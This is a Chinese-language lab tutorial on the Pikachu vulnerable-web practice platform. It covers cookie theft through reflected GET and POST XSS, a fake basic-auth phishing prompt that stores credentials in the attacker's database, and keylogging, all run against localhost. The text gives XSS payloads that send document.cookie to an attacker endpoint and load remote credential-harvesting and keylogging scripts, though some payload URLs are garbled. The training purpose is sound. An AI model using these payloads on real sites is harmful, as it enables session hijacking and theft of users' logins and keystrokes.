XSS 后台的搭建 1 打开pikachu找到管理工具xss后台

2 点击xss后台看到下面的界面就是成功了

3 进行登录页面，登录进去即可。

XSS案例：盗取Cookie 实验机器 攻击者 127.0.0.1 :88 受害者127.0.0.1:88 漏洞服务器127.0.0.1:88 攻击流程

修改C:\xampp\htdocs\pkxss\x Cookie 下的cookie.php，将IP地址改为漏洞服务器的地址（这里注意一下因为xss后台是可以单独拿出来运行的后台，所以我将pkxss后台文件从pikachu文件拿出来放在pikachu同一目录下）

**注意：**由于我把pkxss文件从pikachu拿出来，如果我们从pikachu平台进入xss平台不会成功，这个时候我们想进入xss后台只需要在游览器输入

xss（get）的窃取和利用 在这里我准备了一段js的代码，它会通过document里面的这个location这么一个实例，来做一个重定向，他会访问我们这个 cookie .php 的后台页面，访问的时候通过document中的cookie把本地cookie的值带过去。 1 打开pikachu平台的反射型xss(get)输入 < script >document.location=’#39;+document.cookie;</script> （输入之前要修改长度限制之前文章讲过）

当用户提交的时候，我们就能取得用户的Cookie， 提交过后页面刷新到pikachu的页面这样达到我们想要要求。 2 打开xss后台，可以看见刚刚我们获取的cookie

在实际的场景中我们可以把 发送给用户，一旦他访问啦这个链接，我们便会获得他的cookie值，

图中第二个就是别人访问时我们获取的cookie。

xss（post） 基本原理

实验之前需要将C:\xampp\htdocs\pkxss\xcookie的post-html数据进行相应的id更改这两个地址分别是漏洞服务器 和 攻击者 的服务器地址

1 我们首先是登录一下

2 这里是以POST的方式提交的，参数内容不会出现在URL中，可以抓包看一下

这时候我们不能直接把我们的恶意代码嵌入到URL中 3 我们只需要诱导受害者点击 链接就能窃取用户的Cookie

xss漏洞钓鱼 思路：构造一个payload嵌入到网页中，让用户每次访问这个页面时都会执行我们的payload，我的payload： <script src=”#34;></script>%20%20%20 意思是访问fish.php文件。 fish.php文件内容如下：

fish文件做的事情是：判断用户是否输入了账号和密码，缺一不可，如果没有则弹出一个 basic 验证，如图

当输入账号和密码的时候他就会带着账号和密码访问另一个文件（网页），这个文件就是xfish.php xfish文件如下：

作用是把传来的账号和密码上传到我们（攻击者）的数据库中。 如果你在basic验证框中输入了账号和密码，如图：

则攻击者的数据库中会存有你输入的账号和密码，如图：

xss键盘信息获取 在实验前，我们先了解下什么是跨越

为什么要有同源策略： 设置同源策略的主要目的是为了安全,如果没有同源限制,在浏览器中的cookie等其他数据可以任意读取,不同域下的DOM任意操作,ajax任意请求其他网站的数据,包括隐私数据 开始操作 1 修改ip，ip修改为自己pkxss后台的ip地址

2 在对话框输入 <script src=”%20#34;>%20</script>%20%20%20（这个违反了同源策略，但是由于127.0.0.1:88/pkxss/rkeypress/rkserver.php是攻击者自己搭建的，攻击者可以允许所有的人跨域请求他）

3 我们随便输入几个数字或者字母，会发现我们的js能把我们的输入全都抓下来。